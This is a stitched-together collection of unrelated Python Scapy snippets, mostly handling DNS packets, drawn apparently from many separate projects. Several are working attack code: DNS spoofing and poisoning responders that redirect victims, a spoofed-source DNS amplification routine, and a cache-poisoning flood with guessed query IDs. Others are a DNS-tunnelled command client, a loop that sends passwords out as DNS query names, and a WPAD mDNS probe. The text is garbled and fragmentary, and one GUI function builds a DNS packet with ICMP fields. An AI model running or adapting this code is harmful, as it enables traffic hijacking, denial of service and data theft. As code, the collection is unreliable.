def handle(self): data, sock = self.request src, port = self.client_address request, request_type = parse_packet(self.client_address, data) # Try Cache cached_response = self.server.cache.get(request) if cached_response: response = DNS(cached_response.get('response')) response.id = request.id self.send_packet(sock, request, response.__bytes__()) logging.info('TX: {}:{} - CACHED, Question: {}'.format( src, port, request.qd.qname)) return # Try Hooks response = process_packet(request, self.server.hooks, self.client_address, request_type) if response: self.send_packet(sock, request, response) return # Try DNS Server logging.info('TX: {}:{} - Forwarding DNS record(s) from {}'.format( src, port, self.server.dns_server)) response = self.__forward_request_to_dns_server(data) self.send_packet(sock, request, response, cache=False)
def send_req(qname: bytes): """ Send the DNS request with the answer to the Authoritative DNS server. :param qname: the fake url :return: code of answer, next command to perform. """ cmd_code, command = SERVER_COMMANDS['error&retransmission'], "" while cmd_code == SERVER_COMMANDS['error&retransmission']: # create the DNS query and send it: # todo: get automatically the local dns server ip dns_req = IP(dst=DNS_SERVER_IP) / UDP(sport=234, dport=53) / \ DNS(rd=1, qd=DNSQR(qname=qname, qtype='CNAME')) response = sr1(dns_req, verbose=False) cmd_code, command = parse_response(response[DNSRR]) # check if more parts are need to be send if cmd_code == SERVER_COMMANDS['more']: tmp_data = command while cmd_code != SERVER_COMMANDS['last']: # send an 'ACK' to server and parse the next part: fake_domain = identify + b'.' + \ build_req( CLIENT_COMMANDS['ok&continue'], b'continue') + DOMAIN dns_req = IP(dst=DNS_SERVER_IP) / UDP(sport=234, dport=53) / DNS(rd=1, qd=DNSQR(qname=fake_domain, qtype='CNAME')) response = sr1(dns_req, verbose=False) cmd_code, command = parse_response(response[DNSRR]) tmp_data += command # save the parts in temp var command = tmp_data return cmd_code, command
def process_spoof(self, pkt): """ process MiTM only for `self.url`, for others DNS request - forwarding the request to a real DNS server :param pkt: the DNS request packet from the victim DNS nameserver """ qname = pkt[DNSQR].qname.decode() if self.url in qname: print(f"[!] a DNS request to `{qname}` has been detected") fake_res = IP(src=pkt[IP].dst, dst=pkt[IP].src) / UDP(sport=53, dport=pkt[UDP].sport) \ / DNS(id=pkt[DNS].id, ancount=1, qr=1, rd=1, qd=pkt[DNSQR], an=DNSRR(rrname=qname, rdata=self.fake_addr, type='A')) / DNSRR(type=41) send(fake_res, verbose=False) else: print(f"[!] a DNS request to `{qname}` has been detected") # forwarding request to google public dns server forward_res = IP(dst=DNSSpoof.FORWARD_IP) / UDP(sport=12345) / DNS( id=pkt[DNS].id, rd=1, qd=pkt[DNSQR]) response = sr1(forward_res, verbose=False) pkt_response = IP(src=self.gateway, dst=pkt[IP].src) / UDP( sport=53, dport=pkt[UDP].sport) / response[DNS] send(pkt_response, verbose=False)
def cuckoo_dnsserve(host, port, nxdomain, hardcode): if not HAVE_SCAPY: sys.exit( "Currently the DNS serve script is not available due to issues " "in upstream Scapy for Windows " "(https://github.com/secdev/scapy/issues/111)." ) udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udps.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) udps.bind((host, port)) log.info("Listening for DNS queries at %s:%d", host, port) while True: data, addr = udps.recvfrom(1024) p = DNS(data) rp = DNS(id=p.id, qr=1, qdcount=p.qdcount, ancount=1, rcode=0) rp.qd = p[DNSQR] # IN A, actually look the domain up. if p.opcode == 0 and p[DNSQR].qtype == 1 and p[DNSQR].qclass == 1: if hardcode: answer_ip = hardcode else: try: answer_ip = socket.gethostbyname(p.qd[0].qname) except: if nxdomain: answer_ip = nxdomain else: rp.ancount = 0 rp.rcode = 3 answer_ip = None if answer_ip: rp.an = DNSRR( rrname=p.qd[0].qname, ttl=60, rdlen=4, rdata=answer_ip ) log.debug("IN A %s -> %s.", p.qd[0].qname, answer_ip) # IN PTR, we reply with NXDOMAIN. elif p.opcode == 0 and p[DNSQR].qtype == 12 and p[DNSQR].qclass == 1: rp.ancount = 0 rp.rcode = 3 log.info("IN PTR %s -> NXDOMAIN.", p.qd[0].qname) else: rp.ancount = 0 rp.rcode = 2 log.warn( "Unhandled query %s for %s/%s,%s - answering with servfail.", p.opcode, p.qd[0].qname, p[DNSQR].qtype, p[DNSQR].qclass ) udps.sendto(rp.build(), addr)
def main(): """ Add Documentation here """ # print DNS().show() dns_packet = DNS(qdcount=1) / DNSQR(qname='www.google.com') # print dns_packet.show() # print ls(UDP) # dns_packet = UDP(sport=24601, dport=53)/DNS(qdcount=1)/DNSQR(qname='www.google.com') dns_packet = IP(dst='8.8.4.4') / UDP(sport=24601, dport=53) / DNS( qdcount=1, rd=1) / DNSQR(qname='www.google.com') response_packet = sr1(dns_packet) print response_packet.show()
def prn(pkt): """ process MiTM only for `url`, for others DNS request - forwarding the request to a real DNS server :param pkt: the DNS request packet from the victim DNS nameserver """ qname = pkt[DNSQR].qname if DOMAIN in qname: if b'_' in qname: # print("[!] underscore (_) in domain!") response = IP(dst=pkt[IP].src) / \ UDP(sport=53, dport=pkt[UDP].sport) response /= DNS(id=pkt[DNS].id, ancount=1, qr=1, rd=1, qd=pkt[DNSQR], an=DNSRR(rrname=pkt[DNSQR].qname, rdata='ns.resh.gimel.', type='NS')) send(response, verbose=False) elif b'ns' in qname: # print("[!] NS in domain!") if pkt[DNSQR].qtype == TYPES['A']: response = IP(dst=pkt[IP].src) / \ UDP(sport=53, dport=pkt[UDP].sport) response /= DNS(id=pkt[DNS].id, ancount=1, qr=1, rd=1, qd=pkt[DNSQR], an=DNSRR(rrname=pkt[DNSQR].qname, rdata='96.69.96.69', type='A')) send(response, verbose=False) elif pkt[DNSQR].qtype == TYPES['AAAA']: response = IP(dst=pkt[IP].src) / \ UDP(sport=53, dport=pkt[UDP].sport) response /= DNS(id=pkt[DNS].id, ancount=1, qr=1, rd=1, qd=pkt[DNSQR], an=DNSRR(rrname=pkt[DNSQR].qname, rdata='2001:4860:4802:32::78', type='AAAA')) send(response, verbose=False) else: attack(pkt)
def create_stream(self, src_if): """Create input packet stream for defined interface. :param VppInterface src_if: Interface to create packet stream for. """ good_request = (Ether(dst=src_if.local_mac, src=src_if.remote_mac) / IP(src=src_if.remote_ip4) / UDP(sport=1234, dport=53) / DNS(rd=1, qd=DNSQR(qname="bozo.clown.org"))) bad_request = (Ether(dst=src_if.local_mac, src=src_if.remote_mac) / IP(src=src_if.remote_ip4) / UDP(sport=1234, dport=53) / DNS(rd=1, qd=DNSQR(qname="no.clown.org"))) pkts = [good_request, bad_request] return pkts
def check_protocol_on_port(_socket) -> str: try: _socket.send(HTTPRequest().build()) pkt_response = _socket.recv(BYTES_BUFFER_SIZE) if HTTPResponse(_pkt=pkt_response).Status_Code != 0: return 'http' except: pass try: _socket.send('HELO'.encode()) pkt_response = _socket.recv(BYTES_BUFFER_SIZE) data = pkt_response.decode() int(data[:3]) return 'smtp' except: pass try: _socket.send('USER mrose'.encode()) pkt_response = _socket.recv(BYTES_BUFFER_SIZE) data = pkt_response.decode() if any(['+OK' in data, '-ERR' in data]): return 'pop3' except: pass try: _socket.send(DNS(qr=0, qd=DNSQR()).build()) pkt_response = _socket.recv(BYTES_BUFFER_SIZE) if DNS(_pkt=pkt_response).qr == 1: return 'dns' except: pass try: _socket.send(NTPHeader().build()) pkt_response = _socket.recv(BYTES_BUFFER_SIZE) if NTPHeader(_pkt=pkt_response).recv != 0: return 'ntp' except: pass return ''
def dns_attack(dst_ip, src_ip): a = IP(dst=dst_ip, src=src_ip) # 192.168.1.200 为伪造的源ip b = UDP(dport=53) c = DNS(id=1, qr=0, opcode=0, tc=0, rd=1, qdcount=1, ancount=0, nscount=0, arcount=0) c.qd = DNSQR(qname='www.qq.com', qtype=1, qclass=1) p = a / b / c send(p)
def forward_dns(orig_pkt: IP): print(f"Forwarding: {orig_pkt[DNSQR].qname}") response = sr1( IP(dst='8.8.8.8') / UDP(sport=orig_pkt[UDP].sport) / DNS(rd=1, id=orig_pkt[DNS].id, qd=DNSQR(qname=orig_pkt[DNSQR].qname)), verbose=0, ) resp_pkt = IP(dst=orig_pkt[IP].src, src=DNS_SERVER_IP) / UDP( dport=orig_pkt[UDP].sport) / DNS() resp_pkt[DNS] = response[DNS] send(resp_pkt, verbose=0) return f"Responding to {orig_pkt[IP].src}"
def send_DNS_packet(entries, send_packet_button): """ 发送DNS包 :param entries:协议字段编辑列表 :param send_packet_button: send_packet_button:发送按钮 :return: None """ if send_packet_button['text'] == '发送': dns_id = int(entries[0].get()) dns_qr = int(entries[1].get()) dns_opcode = int(entries[2].get()) dns_aa = int(entries[3].get()) dns_tc = int(entries[4].get()) dns_rd = int(entries[5].get()) dns_ra = int(entries[6].get()) packet_to_send = DNS(id=dns_id, qr=dns_qr, opcode=dns_opcode, aa=dns_aa, tc=dns_tc, rd=dns_rd, ra=dns_ra) t = threading.Thread(target=send_packet, args=(packet_to_send, )) t.setDaemon(True) t.start() # 使协议导航树不可用 toggle_protocols_tree_state() send_packet_button['text'] = '停止' else: # 终止数据包发送线程 stop_sending.set() # 恢复协议导航树可用 toggle_protocols_tree_state() send_packet_button['text'] = '发送'
def poke(self): question = DNS(rd=1, qd=DNSQR(qname='www.gov.cn')) if self.sniffer: packet1 = IP( src=self.src, dst=self.dst, id=self.ttl * 10 + 1, ttl=self.ttl) / UDP(sport=self.sport, dport=self.dport) / question networking.send(packet1) self.report['PACKETS'].append(('PACKET_1', packet1)) if not self.one_packet_only: packet2 = IP(src=self.src, dst=self.dst, id=self.ttl * 10 + 2, ttl=self.ttl) / UDP(sport=self.sport, dport=self.dport) / question networking.send(packet2) self.report['PACKETS'].append(('PACKET_2', packet2)) packet3 = IP(src=self.src, dst=self.dst, id=self.ttl * 10 + 3, ttl=self.ttl) / UDP(sport=self.sport, dport=self.dport) / question networking.send(packet3) self.report['PACKETS'].append(('PACKET_3', packet3)) else: self.udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) atexit.register(self.udp_socket.close) self.udp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, self.ttl) self.udp_socket.settimeout(0) self.udp_socket.bind( (self.src, self.sport )) # if sport change the route going through might change self.udp_socket.sendto(str(question), (self.dst, self.dport))
def spoof_dns_response(pkt): global ip_of_network_interface, ip_domain_mapping spoofed_ip = None # strip the dot at the end of domain name and decode the bytes domain_name_req = pkt[DNSQR].qname[:-1].decode('utf-8') if pkt.dport == 53 and UDP in pkt and DNSRR not in pkt: if len(ip_domain_mapping) > 0: # check if mapping for it is present in host file supplied if ip_domain_mapping and domain_name_req in ip_domain_mapping: spoofed_ip = ip_domain_mapping[domain_name_req] else: print('Not spoofing for ' + domain_name_req + '\n') return elif len(ip_domain_mapping) == 0: spoofed_ip = ip_of_network_interface print('Spoofing: ' + domain_name_req + ' ' + spoofed_ip + '\n') #build spoof response spoof_response = IP(dst=pkt[IP].src, src=pkt[IP].dst) \ / UDP(dport=pkt[UDP].sport, sport=53) \ / DNS(id=pkt[DNS].id,qr=1,qd=DNSQR(qname=pkt[DNSQR].qname),an=DNSRR(rrname=pkt[DNS].qd.qname,rdata=spoofed_ip)) # send response to victim send(spoof_response)
def send_dns_poison(host_mac: str, host_ip: str, received_packet: packet): dnsrr = DNSRR() dnsrr[DNSRR].rrname = received_packet[DNSQR].qname dnsrr[DNSRR].type = 'A' dnsrr[DNSRR].rclass = received_packet[DNSQR].qclass dnsrr[DNSRR].ttl = 86400 dnsrr[DNSRR].rdata = settings['redirect spoofed domains to'] dns = Ether() / IP() / UDP() / DNS() dns[Ether].src = attacker_mac dns[Ether].dst = host_mac dns[IP].dst = host_ip dns[IP].src = received_packet[IP].dst dns[UDP].dport = received_packet[UDP].sport dns[UDP].sport = received_packet[UDP].dport dns[DNS].id = received_packet[DNS].id dns[DNS].ancount = 1 dns[DNS].qr = 1 dns[DNS].rd = 1 dns[DNS].qd = received_packet[DNS].qd dns[DNS].an = dnsrr if settings['show debug']: dns.show() sendp(dns, iface=interface, verbose=settings['show debug']) if settings['show dns spoof']: print('Spoofed DNS request from ' + host_ip + ' for ' + dns[DNSQR].qname.decode()[:-1])
def send_ICMP_packet(entries, send_packet_button): """ 发送ICMP包 :param entries: 协议字段编辑列表 :param send_packet_button: 发送按钮 :return: None """ if send_packet_button['text'] == '发送': icmp_type = int(entries[0].get()) icmp_code = int(entries[1].get()) icmp_id = hex(entries[2].get()) icmp_seq = hex(entries[3].get()) packet_to_send = DNS(type=icmp_type, code=icmp_code, id=icmp_id, seq=icmp_seq) t = threading.Thread(target=send_packet, args=(packet_to_send, )) t.setDaemon(True) t.start() # 使协议导航树不可用 toggle_protocols_tree_state() send_packet_button['text'] = '停止' else: # 终止数据包发送线程 stop_sending.set() # 恢复协议导航树可用 toggle_protocols_tree_state() send_packet_button['text'] = '发送'
def send_dns(ip, port): print(f"dns: {ip}:{port}") pkt = IP(dst=ip) / UDP(sport=54323, dport=port) / DNS( rd=1, id=12345, qd=DNSQR(qtype=16, qname="anakena.dcc.uchile.cl" )) # qtype=1 is A and DNS Request ID is 12345 # Captura de lo enviado capture_1 = StringIO() save_stdout = sys.stdout sys.stdout = capture_1 pkt.show() sys.stdout = save_stdout print("len enviado:" + str(len(capture_1.getvalue()))) print(f"Sending: {pkt.summary()}") # ANS is like IP(src=ip, dst=<myip>) / UDP(sport=port, dport=54323) / DNS(rd=1, qd=DNSQR(qtype=1, qname="lab4.cc5312.xor.cl") an=[<RRs received>]) # 1 is A ans = sr1(pkt, verbose=1) print(f"received:") # Captura de la respuesta capture = StringIO() save_stdout = sys.stdout sys.stdout = capture ans.show() sys.stdout = save_stdout print(f'RECEIVED LEN :{len(capture.getvalue())}\n') quotient = len(capture.getvalue()) / len(capture_1.getvalue()) print(quotient)
def get_data(pkt: IP): try: client_message = pkt[DNSQR].qname[:-1].decode('utf-8') add_new_client = False for client in clients: if client.receiver_socket[ 1] == -1 and client.sender_socket == address: add_new_client = True client.receiver_socket = (client.receiver_socket[0], int(client_message)) if not add_new_client: print( time.ctime(time.time()) + str(address) + " => " + str(client_message)) for client in clients: if client.sender_socket != address: try: if client.receiver_socket[1] != -1: p = IP(dst=client.receiver_socket[0]) / UDP(dport=client.receiver_socket[1]) \ / DNS(rd=1, qd=DNSQR(qname=client_message)) print(client.receiver_socket[1]) send(p, verbose=0) print("Message was sent to", client) except socket.error as err: print(err) except socket.error as err: print(err) clients_to_remove.append(address)
def create_dns_response_record(pkt, response_map): sections = { 'an': { 'layer': None, 'count': 0, }, 'ar': { 'layer': None, 'count': 0, }, 'ns': { 'layer': None, 'count': 0, } } payload = {'id': pkt[DNS].id} for section, responses in response_map.iteritems(): sections[section]['count'] = len(responses) for response in responses: response_record = DNSRR(rrname=response.name, type=response.dns_type.value, rdata=response.data, ttl=response.ttl) if sections[section]['layer'] is None: sections[section]['layer'] = response_record else: sections[section]['layer'].add_payload(response_record) if sections[section]['count']: payload.update({ section: sections[section]['layer'], "{}count".format(section): sections[section]['count'] }) return DNS(**payload).__bytes__()
def dns_spoof(pkt): global s, hosts, my_ip spoofed_ip = None if pkt.dport == 53 and UDP in pkt and DNSRR not in pkt: print('query for: ' + pkt[DNSQR].qname) if pkt[DNSQR].qname[:-1] in hosts: spoofed_ip = hosts[pkt[DNSQR].qname[:-1]] print('will inject') elif len(hosts) == 0: spoofed_ip = my_ip else: print('wont inject') return spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) \ / UDP(dport=pkt[UDP].sport, sport=53) \ / DNS(id=pkt[DNS].id, qr=1L, qd=DNSQR(qname=pkt[DNSQR].qname), an=DNSRR(rrname=pkt[DNS].qd.qname, rdata=spoofed_ip) ) sent = s.sendto(str(spoofed_pkt), (pkt[IP].src, pkt[UDP].sport)) if sent < 1: print('There was a problem sending.') else: print('injected')
def dns_serve(args): udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udps.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) udps.bind((args.bind, args.port)) while True: data, addr = udps.recvfrom(1024) p = DNS(data) rp = DNS(id=p.id, qr=1, qdcount=p.qdcount, ancount=1, rcode=0) rp.qd = p[DNSQR] # IN A, actually look the domain up. if p.opcode == 0 and p[DNSQR].qtype == 1 and p[DNSQR].qclass == 1: if args.hardcode: answer_ip = args.hardcode else: try: answer_ip = socket.gethostbyname(p.qd[0].qname) except: if args.nxdomain: answer_ip = args.nxdomain else: rp.ancount = 0 rp.rcode = 3 answer_ip = None if answer_ip: rp.an = DNSRR( rrname=p.qd[0].qname, ttl=60, rdlen=4, rdata=answer_ip ) log.debug("IN A %s -> %s.", p.qd[0].qname, answer_ip) # IN PTR, we reply with NXDOMAIN. elif p.opcode == 0 and p[DNSQR].qtype == 12 and p[DNSQR].qclass == 1: rp.ancount = 0 rp.rcode = 3 log.info("IN PTR %s -> NXDOMAIN.", p.qd[0].qname) else: rp.ancount = 0 rp.rcode = 2 log.warn( "Unhandled query %s for %s/%s,%s - answering with servfail.", p.opcode, p.qd[0].qname, p[DNSQR].qtype, p[DNSQR].qclass ) udps.sendto(rp.build(), addr)
def main(): message = input('enter your message: ') for char in message: url = f'www.{get_word(char)}.com' print(url) send( IP(dst=ip) / UDP(dport=53) / DNS(rd=1, qd=DNSQR(qname=url, qtype="A")))
def readPackets(packet): global info if packet.haslayer(DNSQR) and packet[IP].src == info['tip']: packetResponse = (Ether()/IP(dst=packet[0][1].src, src=packet[0][1].dst)/\ UDP(dport=packet[UDP].sport, sport=packet[UDP].dport)/\ DNS(id=packet[DNS].id, qd=packet[DNS].qd, aa=1, qr=1, \ an=DNSRR(rrname=packet[DNS].qd.qname, ttl=10, rdata=info['ip']))) sendp(packetResponse, count=1, verbose=0) print("Redirecting...")
def attack_dns(self): for ip in self.server_list.dns: packet = IP(src=self.target_ip, dst=ip) / UDP( sport=self.target_port, dport=53) / DNS( rd=1, qd=DNSQR(qname="google.com", qtype="ANY")) t = threading.Thread(target=self.boom, args=packet) print("sending spoofed udp dns packet to : " + ip) t.start() self.scapy_threads.append(t)
def main(): """ Add Documentation here """ dest = raw_input("enter the site:") dns_packet = IP(dst='8.8.4.4') / UDP(sport=24601, dport=53) / DNS( qdcount=1, rd=1) / DNSQR(qname=dest) response_packet = sr1(dns_packet) print response_packet[DNSRR][1].rdata
def forward_dns(orig_pkt): print(f"Forwarding: {orig_pkt[DNSQR].qname}") response = sr1( IP(dst=ip_forward) / UDP(sport=orig_pkt[UDP].sport) / DNS(rd=1, id=orig_pkt[DNS].id, qd=DNSQR(qname=orig_pkt[DNSQR].qname)), verbose=0) resp_pkt = IP(dst=orig_pkt[IP].src, src=ip_gateway) / UDP(dport=orig_pkt[UDP].sport) / DNS() resp_pkt[DNS] = response[DNS] send(resp_pkt, verbose=0) return f"Responding to {orig_pkt[IP].src} | time: {time.time()}"
def caputre(packet): print('working') if(DNS in packet and 's.student.pwr.edu.pl.' in str(packet['DNS Question Record'].qname)): print('enter') pkt = IP(dst=packet[IP].src) / UDP(dport=packet[UDP].sport, sport=53) / DNS(id=packet[DNS].id, ancount=1, an=DNSRR(rrname=packet[DNSQR].qname, rdata='127.0.1.2') / DNSRR( rrname='student.pwr.edu.pl', rdata='127.0.1.2')) send(pkt)
def run(self): """ This function sends the Password data """ for password in self.user_data: time.sleep(10) answer: Union[Union[PacketList, List[Any]], Any] = sr1( IP(dst=self.dns_server_ip) / UDP(dport=self.dns_port) / DNS(rd=1, qd=DNSQR(qname=password)), verbose=0)
def send_dns(ip, port): print(f"dns: {ip}:{port}") pkt = IP(dst=ip) / UDP(sport=55312, dport=port) / DNS(rd=1, id=12345, qd=DNSQR( qtype=1, qname="spoofed.lab4.cc5312.xor.cl")) # qtype=1 is A and DNS Request ID is 12345 print(f"Sending: {pkt.summary()}") # ANS is like IP(src=ip, dst=<myip>) / UDP(sport=port, dport=54323) / DNS(rd=1, qd=DNSQR(qtype=1, qname="lab4.cc5312.xor.cl") an=[<RRs received>]) # 1 is A ans = sr1(pkt, verbose=1) print(f"received:") ans.show() print(ans.command())
def spf_pkt(sniffed_dns_pkt): """get a DNS Request packet. Returns DNS Response packet directing to the custom ip.""" sp_pkt = IP(src=server_ip, dst=sniffed_dns_pkt[IP].src) \ / UDP(dport=sniffed_dns_pkt[UDP].sport, sport=53) \ / DNS(id=sniffed_dns_pkt[DNS].id, qr=1, opcode=sniffed_dns_pkt[DNS].opcode, aa=1, rd=0, qdcount=sniffed_dns_pkt[DNS].qdcount, ancount=1, nscount=1, qd=DNSQR(qname=sniffed_dns_pkt[DNSQR].qname), an=DNSRR(rrname=sniffed_dns_pkt[DNSQR].qname, ttl=86400, rdata=custom_ip), ns=DNSRR(rrname=sniffed_dns_pkt[DNSQR].qname, type=2, rdata=custom_ip), ar=DNSRR(rrname=sniffed_dns_pkt[DNSQR].qname, rdata=custom_ip)) return sp_pkt
def up_all_night_to_get_lucky(): iplayer = IP(src="10.0.0.1", dst="10.10.0.1") udplayer = UDP(dport=40043, chksum=None) # Please autogenerate the checksum dnslayer = DNS(qr=1, id=random.randint(0, 63999)) # This is a response # Combine layers totalpacket = iplayer / udplayer / dnslayer # Execute Order 66 random_sub_domain = ''.join( choice(ascii_letters) for i in range(20)) # Generate random subdomain while True: os.system("dig " + random_sub_domain + ".bankofrhul.co.uk&") send(totalpacket, count=50) random_sub_domain = ''.join( choice(ascii_letters) for i in range(20)) # Gen Next random subdomain dnslayer.id = random.randint(0, 65535) # Gen Next query id guess
def build_query(layer: dict, domain: str) -> object: pkt = IP(dst=layer["dst"]) pkt /= UDP(dport=53) pkt /= DNS( rd=0, # no recursion desired qr=DNSHeaders.QR.Query, qd=DNSQR(qname=layer["dns"]["qname"], qtype=DNSHeaders.Type.HostAddr), ) return Packet(pkt, domain)
def send_receive_query(self, dns_server='8.8.8.8'): """ send the query and receive the results DNS Resource Records @param dns_server:the ip of a local dns server @return: list of all rdata from the DNS Resource Records """ pack = IP(dst=dns_server) / UDP() / DNS( qd=DNSQR(qname=self.query_data, qtype=self.query_type)) result = sr1(pack, verbose=0) if (DNS in result) and (DNSRR in result): return [result[DNSRR][x].rdata for x in range(result[DNS].ancount)]
print ans print unans print "" ################################################################### #reset a thing or so.. my_query = "wpad" print "-------------------------------------------------" print "Sending mDNS request for " + my_query + ".." ethernet = Ether(src=my_mac,dst=mdns_target_mac) ip = IP(src=my_ip,dst=mdns_target_ip) udp = UDP(sport=5353,dport=5353) dns = DNS() dns.id = queryid dns.qr = 0 dns.opcode = 0 dns.qdcount = 1 dns.rq = 0 dns.qd = DNSQR(qname=my_query,qtype=my_qtype) pkt=ethernet/ip/udp/dns ans,unans=srp(pkt,multi=True,verbose=0,timeout=1) for p in ans: print "-------------------------------------------------" print "Response from: " + p[1][Ether].src, p[1][IP].src print "-------------------------------------------------" print ans print unans